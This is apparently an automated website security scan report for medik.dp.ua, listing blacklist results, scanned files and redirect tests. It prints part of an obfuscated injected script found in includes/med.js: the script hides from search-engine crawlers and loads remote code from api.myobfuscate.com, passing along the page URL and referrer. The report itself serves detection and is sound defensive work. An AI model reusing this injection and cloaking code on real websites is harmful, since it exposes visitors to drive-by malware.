Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=medik.dp.ua
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://medik.dp.ua/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.medik.dp.ua/ | 200 OK Content-Length: 19421 Content-Type: text/html | clean |
http://www.medik.dp.ua/swfobject.js | 200 OK Content-Length: 6830 Content-Type: application/javascript | clean |
http://www.medik.dp.ua/img_func.js | 200 OK Content-Length: 1066 Content-Type: application/javascript | clean |
http://www.medik.dp.ua/includes/med.js | 200 OK Content-Length: 4783 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: api.myobfuscate.com var _1lO='=sTKpUGchN2cl9FKlBXYjNXZuVHKlRXaydnL05WZtV3YvR2Op80TPhCZslGaDRmblBHch5yTwwmC70FMblyJkFWZodCKl1WYOdWYUlnQzRnbl1WZsVEdldmL05WZtV3YvRGI9AyTwwGIyFmdKsTKMJVVuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9wmc1ZyJrkiclJnclZWZy5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0jZlJnJnsyJr9WPjJ3c0V2Z/8SbvNmLlRXYjNXdmJ2b51mLpBXYv8iOwRHdodCI9AyYyNnLP90TKsTKnQHcpJ3YzdCK05WZtVGbFVGdhVmcj5CduVWb1N2bkBSPg80TPBichZ3O9tTKosWYlJnQ7BSKw0jPpcSZsRnc1R1JoY2T4VGZulmL05WZnFkclNXduI3b ...[4373 bytes skipped]... Decoded script: ...[2332 bytes skipped]... re%20%3D%3D%20true%29%20%3F%20%22%3B%20secure%22%20%3A%20%22%22%29%3B%20%7D%3C/script%3E';if(window.navigator.userAgent.indexOf('Rambler')>=0 || window.navigator.userAgent.indexOf('Yandex')>=0 || window.navigator.userAgent.indexOf('Yaho')>=0 || window.navigator.userAgent.indexOf('Googlebot')>=0 || window.navigator.userAgent.indexOf('Turtle')>=0) {Break();};var OOO = document.createElement('script'); OOO.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var l0O = document.getElementsByTagName('head')[0]; l0O.appendChild(OOO);document.write(unescape(_escape)); var _escape='%3Cscript%3Eif%28parent.window.opener%29%7B%20rt5389%20%3D%20GetCookie5389%28%27r5389%27%29%3B%20if%20%28rt5389%20%3D%3D%20null%29%20%7B%20rref5389%3Ddocument.referrer%3B%20rref5389%3Dunescape%28rref5389%29%3B%20var%20ExpDate%20%3D%20new%20Da ...[2760 bytes skipped]... | ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19489 Content-Type: text/javascript | clean |
http://www.medik.dp.ua//mc.yandex.ru/metrika/watch.js/ | 404 Not Found Content-Length: 347 Content-Type: text/html | clean |
http://www.medik.dp.ua/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: medik.dp.ua
Result:
GET / HTTP/1.1
Host: medik.dp.ua
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: medik.dp.ua
Referer: http://www.google.com/search?q=medik.dp.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: medik.dp.ua
Referer: http://www.google.com/search?q=medik.dp.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.